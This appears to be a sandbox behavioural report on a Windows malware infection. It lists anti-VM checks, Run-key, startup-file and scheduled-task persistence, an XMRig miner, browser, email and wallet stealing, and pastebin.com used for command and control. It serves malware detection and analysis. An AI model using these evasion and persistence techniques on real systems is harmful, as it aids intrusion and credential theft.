Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\dxukjxx\gmgc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\dxukjxx\gmgc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\dxukjxx\gmgc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\dxukjxx\gmgc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\ProgramData\dxukjxx\gmgc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b1f64d5430.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\b1f64d5430.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\2CsAdXyX\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\dxukjxx\gmgc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
